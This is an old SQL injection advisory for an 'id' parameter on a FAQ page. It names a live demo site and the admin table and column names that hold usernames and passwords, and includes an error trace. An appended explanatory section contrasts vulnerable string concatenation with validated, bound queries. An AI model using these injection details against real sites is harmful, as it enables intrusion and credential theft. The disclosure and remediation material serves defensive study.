DGC SQL Injection

2012.01.31
Credit: skote_vahshat
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
|*                     { Turki$ hackers }                              |
|*                  I'm Wolf   Long live wolf                          |
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
=======================================================================
\* [Title]  :[dgc sql injection vulnerability]
\* [Author] :[skote_vahshat]
\* [Home]   :[Http://turk-bh.ir]
\* [Email]  :[skote.vahshat@Gmail.Com]
=======================================================================
/* Web Server ==>> [ Apache/2.0.55 (Ubuntu) PHP/4.4.2-1build1 ]
/* Powered-by ==>> [ PHP/4.4.2-1build1 ]
/* DB Server  ==>> [ MySQL ]
/*
/* [+]Exploit :
/* http://www.target.com/faq2.php?id=[SQLi]
/* [+]Demo:
/* http://www.dgc.ca/faq2.php?language=0&id=173&faqid=573
/* [+] Table admin:
/* bs_availability_user
/*
/* [+]column name:
/* username pass
/*
/* [+]ErroR injection:
/*
/*
/*/-----------------------
/*
/* SELECT * FROM faq WHERE id = 573
<?php = array (
  0 => array (
    'file' => '/mnt/alpha/dgc.ca/include/faq.php',
    'line' => 26,
    'function' => 'querydb',
    'class' => 'faq',
    'type' => '->',
    'args' => array (
      0 => 'SELECT * FROM faq WHERE id = 573\\\'',
    ),
  ),
  1 => array (
    'file' => '/mnt/alpha/dgc.ca/include/faq.php',
    'line' => 20,
    'function' => 'load',
    'class' => 'faq',
    'type' => '->',
    'args' => array (
    ),
  ),
  2 => array (
    'file' => '/mnt/alpha/dgc.ca/faq2.php',
    'line' => 150,
    'function' => 'faq',
    'class' => 'faq',
    'type' => '->',
    'args' => array (
      0 => '573\\\'',
    ),
  ),
);
?>
/* // QUERY: SELECT id FROM faq WHERE parent_id = 573\' ORDER BY display_order
<?php = array (
  0 => array (
    'file' => '/mnt/alpha/dgc.ca/include/faq.php',
    'line' => 201,
    'function' => 'querydb',
    'class' => 'faq',
    'type' => '->',
    'args' => array (
      0 => 'SELECT id FROM faq WHERE parent_id = 573\\\' ORDER BY display_order',
    ),
  ),
  1 => array (
    'file' => '/mnt/alpha/dgc.ca/faq2.php',
    'line' => 151,
    'function' => 'get_children_ids',
    'class' => 'faq',
    'type' => '->',
    'args' => array (
    ),
  ),
);
?>
=======================================================================
|_***_| special thanks : bl4ck.viper ,dr.tofan , nafsh, netqurd |
|_***_| tbh team , cyberwh team , all turkiS hackers|
=======================================================================
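The dump above shows the request value reaching querydb() with its quote backslash-escaped (573\') yet still concatenated into an unquoted numeric comparison. As an added example (not code from the advisory or the affected site), the PHP below contrasts that pattern with integer validation plus a bound parameter; the function names, the table rows and the in-memory SQLite database standing in for MySQL are assumptions.

```php
<?php
// Added example: constructed schema and rows, not the affected site's code.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE faq (id INTEGER PRIMARY KEY, question TEXT)');
$db->exec("INSERT INTO faq VALUES (173, 'constructed row A'), (573, 'constructed row B')");

// Pattern implied by the dump: the value is escaped as if it were a string,
// then concatenated into a numeric context where no quotes enclose it.
// (load_faq_concat is a hypothetical name.)
function load_faq_concat(PDO $db, string $id): array
{
    $sql = 'SELECT * FROM faq WHERE id = ' . addslashes($id);
    try {
        return ['sql' => $sql, 'rows' => $db->query($sql)->fetchAll(PDO::FETCH_ASSOC)];
    } catch (PDOException $e) {
        return ['sql' => $sql, 'error' => $e->getMessage()];
    }
}

// Hardened form: accept only decimal digits, then bind the value so the
// database never parses it as SQL text. (load_faq_bound is a hypothetical name.)
function load_faq_bound(PDO $db, string $id): array
{
    if (!ctype_digit($id)) {
        return ['error' => 'id must be a non-negative integer'];
    }
    $stmt = $db->prepare('SELECT * FROM faq WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return ['rows' => $stmt->fetchAll(PDO::FETCH_ASSOC)];
}

// Constructed inputs: a valid id, the quoted value from the dump, and an
// arithmetic expression that contains nothing for addslashes() to escape.
foreach (["573", "573'", "570+3"] as $input) {
    echo "input: $input\n";
    echo '  concat: ', json_encode(load_faq_concat($db, $input)), "\n";
    echo '  bound:  ', json_encode(load_faq_bound($db, $input)), "\n";
}
```

With the concatenated query, the quoted input produces a database error like the one in the dump, and 570+3 is evaluated by the database and matches row 573, which shows the value is being parsed as SQL. The bound version rejects both inputs before any query runs.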

References:

http://packetstormsecurity.org/files/109215/dgc-sql.txt

